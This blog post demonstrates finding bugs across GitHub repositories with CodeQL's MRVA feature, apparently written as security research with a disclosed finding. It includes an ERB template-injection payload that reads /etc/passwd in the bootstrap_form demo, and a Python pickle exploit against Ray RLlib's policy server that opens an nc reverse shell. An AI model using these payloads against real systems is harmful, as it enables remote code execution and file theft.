Finding Vulnerabilities with MRVA CodeQL
[*] INDEX:
1- What is MRVA?
Is known by everyone the power of CodeQL, analyzing a repository with a single click, but with MRVA security researchers have a new way to perform security research across GitHub.
Using MRVA (multi-repository variant analysis), researchers can execute a query on the top 1000 Github repositories at once, significantly enhancing their ability to uncover potential security issues across a broader spectrum of projects.
This can be even more interesting by combining it with other tools such as Github Code Search to obtain a more specific list of repositories to analyze (e.g. if we’re running a Ruby SSTI query we’ll be only interested in those repositories that uses ERB or Slim) or use a query that we have developed, being the first to run that query so that the chances of finding something interesting are higher.
2- MRVA vs CodeQL suites
So what’s the difference between MRVA and CodeQL suites?
MRVA is a CodeQL feature that takes part in a large number of repositories. It would be more correct to ask when it is more convenient to use CodeQL in a single repository or to use MRVA in up to 1000. If the user is interested in finding vulnerabilities in a specific repository, CodeQL suites would be the ideal solution for his needs. The suites give us the possibility to run a list of queries with different vulnerabilities that will give us much more chances of finding something in the specific repository.
CodeQL
But if CodeQL suites gives us a better coverage of vulnerabilities, what’s the point of using MRVA? MRVA allows you to run a single query in many repositories, it allows you to find a type of vulnerability in many sites which CodeQL suites cannot. This can be interesting for those who are interested in developing custom queries, it would save a lot of time.
MRVA
3- How to set up MRVA
3.1 - Download CodeQL extension in VSCode
First of all we have to download the CodeQL extension for Visual Studio Code a version up to 1.8.0.
3.2 - Configure our Github controller
Now we go to our Github and create a repository named controller
(although any name works) and remember to make at least one commit. The reason we’re doing this is because MRVA uses Github actions to run CodeQL queries against databases that are already created and stored on Github (imagine having to create a thousand databases for a thousand projects, it would take forever, GitHub already does the work for us 😎).
Once the controller is ready we have to edit our CodeQL extension settings.json
:
Then add the following line for MRVA controller repository (replace your_username
to your Github username):
"codeQL.variantAnalysis.controllerRepo": "your_username/controller",
Now we’re ready to run it 😎.
4- Code Search tools
We can use Github Code Search to find code snippets of interest. The interesting part here is creating a custom list of repositories that utilize the methods we are scanning. This approach goes beyond merely analyzing the top 1000 repositories and enables us to focus on specific projects that are relevant to our interests and research.
Luckily, Github API already supports Code Search (before it only supported code legacy), so we can take advantage of that and create a tool. In my case, this is the script I used, here is the repository:
import requests
import re
import urllib.parse
import argparse
token = ""
pattern = '(?<="full_name":")([^"]+)'
headers = {
"Accept": "application/vnd.github+json",
"Authorization": f"Bearer {token}",
"X-GitHub-Api-Version": "2022-11-28"
}
def request_api(query):
results = []
i = 1
while True:
url = f"https://api.github.com/search/code?q={urllib.parse.quote(query)}&per_page=100&page={i}"
r = requests.get(url, headers=headers)
content = re.findall(pattern, r.text)
results.extend(content)
i+=1
if len(content) != 100:
break
return [*set(results)]
def output(filename, content):
with open(filename, "w") as f:
f.write(str(content))
if __name__ == "__main__":
parser = argparse.ArgumentParser()
parser.add_argument('-q','--query', help='Query', required=True)
parser.add_argument('-f','--filename', help='filename', required=True)
args = parser.parse_args()
query = args.query
filename = args.filename
results = request_api(query)
output(filename, results)
Remember to add your Github token to make it work. This tool creates a custom list including all those repositories that utilizes the code we specify in the query argument:
Although Code Search feature is included in Visual Studio Code since June 23 (Github Blog). The configuration is very simple, we just have to go to the CodeQL extension, create a list (I called it test
):
We can even specify the language used:
And finally we specify our query for Code Search, in my case I used maikypedia
so all repositories in which the word maikypedia appears will be included in the list:
5- Fishing with MRVA 🎣
5.1- Server Side Template Injection (Ruby)
Let’s move to the fun part, I have written a query for Server Side Template Injection in Ruby covering ERB and Slim, let’s try luck with MRVA!
As any static analysis tool we have to take into account the number of false positives, which will depend on the quality of the query, in this case we have had 4 results from the top 1000 Github repositories. After discarding the false positives we are left with a repository: bootstrap-ruby/bootstrap_form
.
Let’s set up the server and check if it is really vulnerable:
bootstrap_form/demo/bin ❯ sudo ./rails s
Now we should have our rails application running on port 3000, but let’s check the code first:
def fragment
@erb = params[:erb]
@erb.prepend '<div class="p-3 border">'
@erb << "</div>"
load_models
render inline: @erb, layout: "application" # rubocop: disable Rails/RenderInline
end
This fragment
takes a parameter named erb from the params hash (HTTP GET parameter) and assigns its value to an instance variable @erb. Then some html is appended and prepended to the variable, then it’s finally rendered using render inline:
, method that functions like ERB.new(@erb).result
.
This function is called when a user visits /fragment
we can see this specified in the file routes.rb
:
Dummy::Application.routes.draw do
get "fragment" => "bootstrap#fragment", as: :fragment
resources :users
root to: "bootstrap#form"
end
So let’s jump to the browser! We can use the following payload to read /etc/passwd
and prove the SSTI (don’t forget url encode it):
<%= IO.popen('cat /etc/passwd').readlines() %>
Nice 😎. But unfortunately, as the file path says, this is a demo application with no real security implications, so even though it is “vulnerable” at the code level, it has no impact.
5.2- Unsafe Deserialization (Python)
I found this when I was modeling unsafe deserialization sinks for Python including pandas.read_pickle
and others. To my surprise, at the time of running MRVA waiting for some result of my sinks I found this:
It was a result with a sink from the original query and seeing the code snippet it seemed that it could be a TP. The repository is ray-project/ray
.
The vulnerability resides in RLlib’s PolicyServerInput
class (/ray/python/ray/rllib/env/policy_server_input.py
). Specifically, on line 266, the HTTP POST handler in use deserializes user data using pickle. Using pickle for deserializing data from untrusted sources can be dangerous, as it allows the execution of arbitrary code during the deserialization process.
def do_POST(self):
content_len = int(self.headers.get("Content-Length"), 0)
raw_body = self.rfile.read(content_len)
parsed_input = pickle.loads(raw_body)
The vulnerable class is used in the examples like /ray/rllib/examples/serving/cartpole_server.py
(l.101-115):
if __name__ == "__main__":
args = parser.parse_args()
ray.init()
def _input(ioctx):
if ioctx.worker_index > 0 or ioctx.worker.num_workers == 0:
return PolicyServerInput(
ioctx,
SERVER_ADDRESS,
args.port + ioctx.worker_index - (1 if ioctx.worker_index > 0 else 0),
)
Now it’s time for the PoC 😁. Run the example server:
python3 /ray/rllib/examples/serving/cartpole_server.py
And then, send the malicious data to the policy server port:
import requests
import pickle
import os
attacker = "localhost"
attacker_port = "4444"
class RCE:
def __reduce__(self):
cmd = (f'rm /tmp/f; mkfifo /tmp/f; cat /tmp/f | /bin/sh -i 2>&1 | nc {attacker} {attacker_port} > /tmp/f')
return os.system, (cmd,)
# Serialize the malicious class
pickled = pickle.dumps(RCE())
# Define the URL to which you want to send the POST request
url = "http://localhost:9900/"
headers = {
"Content-Type": "application/octet-stream", # Indicate that we are sending binary data
}
# Send the POST request with the serialized data
requests.post(url, data=pickled, headers=headers)
And as a final step, we run the exploit:
python3 exploit.py
Once again, we find ourselves at the gates. It has been demonstrated that MRVA has great potential for finding vulnerable code. This vulnerability was reported to ray project and they stated is that code that should only be exposed to trusted parties. Therefore, there hasn’t been a fix, but rather a comment to make the warning more explicit in this commit.